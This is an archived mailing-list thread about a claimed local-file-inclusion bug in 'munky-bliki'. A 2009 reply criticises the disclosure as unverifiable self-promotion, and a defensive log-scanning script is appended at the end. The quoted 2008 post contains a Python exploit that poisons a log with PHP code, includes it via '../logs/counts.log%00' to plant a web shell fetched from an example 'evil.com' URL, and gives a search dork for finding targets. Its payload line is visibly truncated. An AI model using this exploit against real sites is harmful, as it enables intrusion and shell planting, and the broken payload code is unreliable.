Re: munky-bliki lfi

2009-01-26 Thread security curmudgeon

On Fri, 15 Aug 2008, r3d.w...@yahoo.com wrote:

(pardon the late reply)

: #!user/bin/python
: # -*- coding: cp1256 -*-
: #
:    munky-bliki Lfi
: #
: #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
: #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
: #Our Site : Http://IRCRASH.COM
: #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
: #
: #Script Download : http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz

Googling for "munky-bliki" gets nothing but references to this post.

This is not the first 'sourceforge project' that doesn't exist within a 
month of a vulnerability disclosure.

http://sourceforge.net/search/?type_of_search=soft&words=munky-bliki

Search results in projects found for "munky-bliki"
Search Help
Results 1 - 0 of 0 

If you broaden the search for "munky", you get the page intended I think 
though?:

http://sourceforge.net/projects/munky/

But, you fail to specify:  Last Update: Jan 03 2005

So in essence, you are taking 3+ year old software, that was in version 
0.01a, and posting a vulnerability in it. You do not include the official 
project name (mUnky), home page, release date, affected script or anything 
else that would allow someone to easily validate this finding.

: #DORK : "Copyright © 2004 Dovid Kopel"

No hits on the first page.

How is it that so many posts to Bugtraq/F-D involve software that doesn't 
appear to exist, or be used by anyone reachable by Google?

: #   Site : Http://IRCRASH.COM
: ## TNX GOD ##

Yet, you can find the time to type in your domain/name at least 4 times in 
this post..

Someone recently pointed out that 'vulnerability disclosures' like this 
may actually be a form of covert broadcast designed to manipulate search 
engines.

Personally, I think any post to Bugtraq should now be screened, and if the 
vendor's home page is not included, drop the post.

How about you spend less time picking 'cool' nicknames, less time 
developing two web sites (ircrash.com, r3dw0rm.ir) and more time posting 
legitimate research that involves less ego.

Thanks!

- jericho

munky-bliki lfi

2008-08-15 Thread r3d . w0rm
#!user/bin/python
# -*- coding: cp1256 -*-
#
   munky-bliki Lfi
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#Our Site : Http://IRCRASH.COM
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
#
#Script Download : http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz
#
#DORK : "Copyright © 2004 Dovid Kopel"
#
#  [Bug]
#
#http://Site/?zone=file.type%00
#
# [Note]
#
#By this exploit u can create a shell on valun site ;)
#
#   Site : Http://IRCRASH.COM
#
## TNX GOD ##

import httplib,urllib
site=raw_input('Site [Ex www.r3d.com]: ')
path=raw_input('Path [Ex /munky]: ')
shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ')
print "[*]Powered by : R3d.W0rm - [EMAIL PROTECTED]"
conn=httplib.HTTPConnection(site)
print "[*]Connected to " + site
print "[*]Sending shell code ..."
conn.request('GET',path + 
"/?zone=');fclose($fp);?>")
print "[*]Running shell code ..."
data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00')
print "[*]Shell created"
print "[*]" + site + path + '/r3d.w0rm.php'
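
Added example, not part of either post above: a log check for the request pattern the advisory describes, namely a `zone` value carrying a null byte, a traversal such as `../logs/counts.log`, or PHP tags meant to land in a log file. It assumes a combined-format access log; the sample lines, addresses and function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Aug/2008:10:00:01 +0000] "GET /munky/?zone=home HTTP/1.1" 200 5120
192.0.2.44 - - [15/Aug/2008:10:02:13 +0000] "GET /munky/?zone=%3C%3Fphp%20echo%201%3B%3F%3E HTTP/1.1" 200 312
192.0.2.44 - - [15/Aug/2008:10:02:14 +0000] "GET /munky/?zone=../logs/counts.log%00 HTTP/1.1" 200 9001
192.0.2.77 - - [15/Aug/2008:10:05:40 +0000] "GET /munky/?zone=file.type%00 HTTP/1.1" 200 4210
198.51.100.5 - - [15/Aug/2008:10:06:02 +0000] "GET /munky/?page=2&zone=news HTTP/1.1" 200 2048
"""

# client address and request target from a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# Reason label -> predicate on the URL-decoded parameter value.
CHECKS = {
    "null-byte": lambda v: "\x00" in v,                         # %00 truncation
    "path-traversal": lambda v: "../" in v.replace("\\", "/"),  # ../logs/...
    "php-tag": lambda v: "<?" in v,                             # code aimed at a log file
}

def suspicious_zone_requests(log_text, param="zone"):
    """Return (client, raw_target, reasons) for requests whose `param`
    value looks like a file-inclusion attempt."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target = m.groups()
        # parse_qsl percent-decodes, so %00 and %2e%2e%2f are checked decoded
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if name != param:
                continue
            reasons = sorted(r for r, test in CHECKS.items() if test(value))
            if reasons:
                findings.append((client, target, reasons))
    return findings

if __name__ == "__main__":
    for client, target, reasons in suspicious_zone_requests(SAMPLE_LOG):
        print(client, target, ",".join(reasons))
```

A tagged request followed shortly by a traversal request from the same client, as in the second and third sample lines, is the sequence worth alerting on.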